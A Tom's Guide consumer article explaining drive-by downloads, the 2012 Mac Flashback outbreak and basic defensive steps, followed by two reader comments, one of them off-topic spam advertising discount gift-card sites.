Sign in with
Sign up | Sign in

Drive-By Downloads: How They Attack and How to Defend Yourself

By - Source: Tom's Guide US | B 2 comments

Drive-by downloads are malicious pieces of software that are downloaded to a computer, tablet or smartphone when the user views a compromised Web page or an HTML-based email message that links to a website.

In many cases, the malware will be automatically installed on the system; in almost all cases, the user won't be aware of it.

MORE: Trojan Horses: What They Are and How to Avoid Them

The malware delivered by a drive-by download is usually classified as a Trojan horse, or Trojan for short, because it deceives the user about the nature of the website or email. In most cases involving compromised websites, the operator of the website has no idea his site is distributing malware.

Once installed, malware delivered by a drive-by download can do a number of different things: log keystrokes, scan the system for files of a personal nature, herd the system into a botnet of similarly compromised machines, infect the Web browser with a banking Trojan that hijacks online-banking sessions or install a "backdoor" that will let in even more malware.

Modern Web browsers such as Firefox and Google Chrome, as well as robust anti-virus software, will alert users when browsers visit websites known to be compromised or malicious. But many drive-by download links are well hidden and won't cause infected sites to appear on blacklists of compromised sites.

A real-world example

The Mac Flashback outbreak, which infected an estimated 600,000 Macs in March 2012, showed how successful drive-by downloads can be.

Malware writers began by creating a fake "toolkit" for WordPress-based blogs that tens of thousands of WordPress users installed, creating a "backdoor" that let the malware writers infect their blogs.

Browsers visiting those pages were redirected to malware sites, which tried to install a "downloader," the first part of the Flashback Trojan. If direct installation of the downloader without the knowledge of the user failed, another piece of malware used a more traditional technique: It asked the user for permission to install (fake) Apple software, which was in fact the downloader.

Once installed, the downloader would install more malware. One piece was a backdoor; another hijacked Web browsers to replace Web ads with ads controlled by the malware writers.

The Flashback outbreak was contained by Apple security updates in early April 2012, but in retrospect, the owners of those 600,000 infected Macs were lucky.

The backdoor didn't install anything except fake ads. It could have instead stolen the users' identities, emptied their bank accounts or used the infected machines to pump out spam and malware.

How to protect yourself

To avoid being infected by drive-by downloads, computer users need to do three things.

First, set up the user accounts so that all regular users have limited permissions and cannot modify applications or the operating system. Create a separate administrator account to be used only when installing, updating or deleting software. Do not use the administrator account to browse around the Web or read emails.

Second, set the computer so that operating-system updates are automatically installed, and turn on whatever firewalls are available. (If you have a wireless router, its firewall should also be activated.)

Third, install a robust anti-virus software product, set it to automatically update itself with the latest malware definitions, and make sure it performs regular full-system scans.

Many free anti-virus products are available, but the paid ones do a better job of protecting Web browsers and email clients from drive-by downloads.

Smartphone and tablet users need to take different precautions. Owners of Apple iOS devices such as the iPhone, iPad and iPod Touch should avoid "jailbreaking" their devices and should install Apple system updates.

Android owners, however, should never immediately install a system update that suddenly appears on their screen; instead, they should check the Google Mobile Blog to check whether it's legitimate. Installation of mobile security software is also essential for Android users.

Follow us @tomsguide, on Facebook and on Google+.

Discuss
Display 2 comments.
This thread is closed for comments
  • 1 Hide
    jakjawagon , March 6, 2014 7:55 PM
    Quote:
    the paid ones do a better job of protecting Web browsers and email clients from drive-by downloads.
    Citation needed.
  • 0 Hide
    Darek Dochnal , March 9, 2014 9:55 PM
    I agree! Hulu and Netflix are two different, Netflix is expensive because they do not sell gift cards, I buy Hulu for 60% OFF on DiBuu.com auctions because over there sellers sell discounted cards online, also Dibuu a new Ebay competition allow people trading for FREE so everything is cheaper than on ebay between 10-25%. If somebody interested in nice deal on movies, sitcoms , season buy or rent feature as well as I found out VUDU codes 50% OFF on NETSTRADA.com , you can rent movies there like from Redbox , so movie usually is $4.99 with discounted card cost you only $2 in any place on the world with hidden IP of-course. Also there is 4saleusa.com which sell iTunes below the MSRP value, so you can use HULU or VUDU on your mac devices like iphone or ipad by wi-fi or 4G , Apple TV is nice too. Hope I save you big B@cks by this post!
Tom’s guide in the world
  • Germany
  • France
  • Italy
  • Ireland
  • UK
Follow Tom’s guide
Subscribe to our newsletter